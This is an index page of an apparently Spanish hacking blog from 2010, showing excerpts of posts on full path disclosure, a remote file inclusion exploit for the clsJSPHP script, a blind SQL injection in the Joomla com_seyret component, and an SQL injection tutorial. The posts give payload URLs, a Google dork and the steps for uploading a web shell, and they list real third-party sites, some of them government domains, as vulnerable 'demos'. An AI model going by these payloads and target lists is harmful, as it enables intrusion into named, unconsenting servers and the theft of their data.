}:-)

Publicado el 31/08/2010 12:08:00 en Off Topic.

Feria de Ciencia y Tecnologia 2010




* Conferencias
* Exhibición de proyectos de estudiantes
* Presentaciones artísticas






Abierto para todo el publico





El evento se realizara en el Instituto .U Illia
Jueves 11 de noviembre
desde las 9.00 hs

Olsacher 99




Organiza: Departamento de Ciencia y Tecnología




Comentarios: 0 | Leer comentarios

Publicado el 06/07/2010 12:07:00 en Hacking Web. Total de votos: 5  Votar

Este texto es algo viejito y lo encontré por ahí en mi disco, debe ser como del 2006-7 así que quería compartirlo for newbies (aunque halla 78347834 de textos sobre esto xD).


Bueno esto del "Full Path Disclosure" es una pequeña técnica que puede servirnos para conseguir información sensible sobre las rutas de un servidor y verán por que .. bueno empecemos ..

El full path disclosure como su traducción lo dice es: "Una Divulgación de la ruta completa" y tiene como fin conseguir un poco más de info. sobre un servidor o victima.

consiste en que tras introducir valores mal formados podamos producir errores de los cuales extraer la ruta. Esto te va sonando más Verdad? Son los clásicos errores de:

Warning: main(/include/lang/es.php): failed to open stream: No such file or directory in /home/PoC/include/global.php on line 18

Warning: main(): Failed opening '/include/lang/es.php' for inclusion (include_path='.:/home/PoC/include') in /home/miarroba/include/global.php on line 18 t


donde por ejemplo esto seria la ruta completa:

/home/miarroba/include/global.php


para que sirve tener la ruta? bueno supongamos que tenemos una web que no es vulnerable .. pero al hacer un reverse ip lookup nos tira 3 web's más alojadas en el mismo servidor que donde una de ellas es vulnerable ya que encontramos una inyección mysql configurado con "magic_quotes = on" .. solo necesitaríamos tener la ruta completa para subir una shell .. este es un ejemplo :) (si quieren saber sobre como subir una shell con una inyección mysql visitar: "Gran tutorial de inyecciones SQL")


por ejemplo tenemos los 4 dominios:


vicitima.com

más los 3:

primeralojado.com
segundoalojado.com
terceralojado.com

sabemos que victima.com no podemos vulnerar ..
segundoalojado.com es vulnerable a inyección mysql.
y terceralojado.com tiene full path disclosure donde la ruta de terceralojado.com es /home/victor/terceralojado.com/public_html

esto viene a que podemos identificar las rutas de las demás webs ejemplo:


si terceralojado.com tiene una ruta que es: /home/victor/terceralojado.com/public_html

por que no, las demás pueden ser parecidas? ejemplo:

/home/victor/terceralojado.com/public_html
/home/victor/primeralojado.com/public_html
/home/victor/segundoalojado.com/public_html

y hasta la ruta de victima.com

/home/victor/victima.com/public_html

entonces .. ya tenemos la ruta!. Ahora si encontramos una carpeta llamada "tmp" en victima.com con DirBuster lógicamente la relacionamos a que puede ser temporal y con permisos de escritura..

entonces usamos la inyección mysql .. más l... [/trombi]

Continúa aquí...

Comentarios: 11 | Leer comentarios

Publicado el 23/03/2010 12:03:00 en Hacking Web. Total de votos: 10  Votar

clsJSPHP RFI vulnerabilty


Autor: Artur Heinze
Version: 0.12 alpha

No es nada complejo pero voy a aclarar las dudas comentando las imagenes, si tienen preguntas no lo duden :).

PoC/Exploit:

Variables del AJAX por POST.



Modificando los valores:



claramente en "phpinc" se produce un error, vemos que puede incluir archivos y no hay muchas restricciones así que vamos a aprovecharlo.




Explotando:

Vamos a incluir un archivo remoto con el control a nuestro favor .. primero creamos un archivo con cualquier extensión menos php con nuestro código php y lo subimos a un servidor.



Lo que hacemos es incluir la dirección del "txt" en la variable phpinc y al "Repetir" el code se ejecuta automaticamente:



Resultado:

La shell:

Este code php copia un archivo remoto y lo descarga en el servidor: (own.php)




Code vulnerable:







Demos:

http://yse-uk.com/cls/clsJSPHP.php
http://www.conzentriert.info/scripte/clsJSPHP.php
http://www.vernale.ru/clsJSPHP.php
http://www.lamoda-hh.de/js/clsJSPHP.php
http://www.tempiodimecenate.it/INCLUDE/clsJSPHP.php
http://www.primavera-maexx.de/scripte/clsJSPHP.php
http://www.riogrande.rs.gov.br/site/img/js/clsJSPHP.php
http://stroydobro.ru/clsJSPHP.php



Espero que le sirva a alguien, Saludos!

Comentarios: 2 | Leer comentarios

Publicado el 10/03/2010 12:03:00 en Hacking Web. Total de votos: 3  Votar

Version: N/A
PoC/Exploit: /index.php?option=com_seyret&task=videodirectlink&id=2'(blind)
PoC/Exploit nº2: SQLMAP

Google Dork: allinurl:com_seyret




Demo:

http://www.dansocial.gov.co/capturasiss/index.php?option=com_seyret&task=videodirectlink&id=1
http://www.lacanciondelverano.net/index.php?option=com_seyret&task=videodirectlink&id=2
http://www.farmar.com.ar/index.php?option=com_seyret&task=videodirectlink&id=1
http://www.gobernacion-narino.gov.co/index.php?option=com_seyret&task=videodirectlink&id=14
http://www.imta.gob.mx/potaia/index.php?option=com_seyret&task=videodirectlink&id=15




No tengo mucha información del modulo y sobre que versiones son vulnerables .. más tarde la analizo detalladamente y confirmo la vuln.


Saludos!

Comentarios: 0 | Leer comentarios

Publicado el 04/03/2010 12:03:00 en Hacking Web. Total de votos: 13  Votar

+--------------------------------------------------------+

| SQL injection && Blind Sql Injection |


| Escrito por l0ve |

+--------------------------------------------------------+


¿Qué es sql injection?

"Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la
base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las
partes del programa con código SQL. Es, de hecho, un error de una clase más general de
vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté
incrustado dentro de otro.
Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro
código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código
"invasor" en la base de datos."

Fuente: http://es.wikipedia.org/wiki/Inyección_SQL

¿Qué vamos a ver?

Vamos a buscar, reconocer y explotar de distintas formas "inyecciones SQL" en aplicaciones web con bases de datos MySQL version 4.x o 5.x ..

aclaración: Algunas cosas explicadas acá puede ser que no funcionen en otras base de datos ya que no todas son iguales, hay variedades de ellas ... mysql, mssql (sql server), sqlite, oracle etc ..

Antes de empezar vamos a repasar algunas cosas básicas:

? enlaza la URL con los parámetros.
& delimita donde termina un parámetro y donde comienza el otro.
= asigna el valor.

Recuerda bien ;).

Empecemos ...

Nota: En los ejemplos voy a usar siempre "localhost" y un script en php llamado "print.php"

¿Cómo reconocer una vulnerabilidad sql?

Hay varias formas de hacerlo, entre ellas puede ser usando una comilla simple ' (''%27'') al
final de la URL:

http://localhost/print.php?id=332'

también con:

- paréntesis ")"
- "comentarios" como ''/*'' , ''--'' o "#"
- palabras del lenguaje sql como "select,order by" etc ..

Ejemplos:

http://localhost/print.php?id=12) --
http://localhost/print.php?id=12)) --
http://localhost/print.php?id=12 '--
http://localhost/print.php?id=12 ') --
http://localhost/print.php?id=12 ')) --

veamos:





el tema con los "comentarios" es que puede ser que c... [/trombi]

Continúa aquí...

Comentarios: 6 | Leer comentarios

Ver: Siguientes 5